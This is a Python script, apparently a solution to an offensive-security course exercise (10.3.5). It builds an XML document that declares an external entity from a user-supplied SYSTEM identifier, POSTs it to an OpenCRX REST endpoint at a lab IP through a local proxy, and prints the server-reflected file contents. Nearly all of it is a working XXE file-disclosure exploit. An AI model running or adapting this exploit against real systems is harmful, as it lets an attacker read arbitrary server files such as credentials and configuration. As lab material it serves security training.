10.3.5
Create a script to parse the results of the XXE attack and cleanly display the file contents.
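#!/usr/bin/python3
"""Exercise 10.3.5: build the XML document for the XXE exercise, POST it to the
OpenCRX REST endpoint and print the value the server reflects back.

Fixes over the original flat script: ``xml.etree.cElementTree`` (removed in
Python 3.9) is replaced by ``xml.etree.ElementTree``; the two bare ``except:``
clauses are narrowed to the exceptions the code can actually raise; the
response is parsed inside the guarded region so an unparseable body prints
"error" instead of a traceback; the script is wrapped in ``main()`` so it does
nothing on import.
"""
import argparse
import re
import requests
import xml.etree.ElementTree as ElementTree

# Intercepting proxy the request is routed through.
PROXIES = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
# HTTP basic-auth credentials for the REST call.
USERNAME = "guest"
PASSWORD = "password"
# REST endpoint the XML document is POSTed to.
TARGET = "http://192.168.228.126:8080/opencrx-rest-CRX/org.opencrx.kernel.account1/provider/CRX/segment/Standard/account"
# Scratch file the serialized document is staged in before it is sent.
PAYLOAD_FILE = "temp.tmx"


def parse_args():
    """Return the parsed command line.

    ``--inject`` (required) is used verbatim as the SYSTEM identifier of the
    ``lastname`` entity declared in the document prolog.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--inject', help='XML Payload to Inject', required=True)
    return parser.parse_args()


def build_payload(inject):
    """Stage the document in PAYLOAD_FILE and return its text.

    Args:
        inject: SYSTEM identifier written into the ``lastname`` entity declaration.

    Returns:
        The file contents read back as text: the hand-written prolog followed
        by the serialized ``Contact`` element.
    """
    contact = ElementTree.Element("org.opencrx.kernel.account1.Contact")
    ElementTree.SubElement(contact, "lastName").text = "&lastname;"
    ElementTree.SubElement(contact, "firstName").text = "Test"
    prolog = f'<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE data [ <!ELEMENT data ANY ><!ENTITY lastname SYSTEM "{inject}">]>'
    with open(PAYLOAD_FILE, 'wb') as out:
        out.write(prolog.encode('utf8'))
        # With encoding 'utf-8' ElementTree emits no XML declaration of its
        # own, so the prolog above remains the only one in the file.
        ElementTree.ElementTree(contact).write(out, 'utf-8')
    with open(PAYLOAD_FILE, 'r') as back:
        payload = back.read()
    # Substitution retained from the original script; as written it is an
    # identity replacement.
    return re.sub("&", "&", payload)


def show_result(response):
    """Print the reflected ``lastName`` value, or ``error`` when it cannot be located.

    On a 401 reply the script reads the text at index ``[2][1][2]`` of the
    response document (the expected shape of the server's error document is
    not verified here — confirm against a captured response); on a 200 reply
    it reads the ``lastName`` element. Any other status prints nothing, as in
    the original script.

    Args:
        response: the ``requests.Response`` returned by the POST.
    """
    try:
        res_tree = ElementTree.fromstring(response.content)
        if response.status_code == 401:
            print(res_tree[2][1][2].text)
        elif response.status_code == 200:
            print(res_tree.find("lastName").text)
    except (ElementTree.ParseError, IndexError, AttributeError):
        # Unparseable body, a 401 document of a different shape, or a 200
        # body without a lastName element.
        print("error")


def main():
    """Build the document, POST it through the proxy and print the reflected value."""
    args = parse_args()
    payload = build_payload(args.inject)
    response = requests.post(url=TARGET, data=payload, proxies=PROXIES, auth=(USERNAME, PASSWORD))
    show_result(response)


if __name__ == "__main__":
    main()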
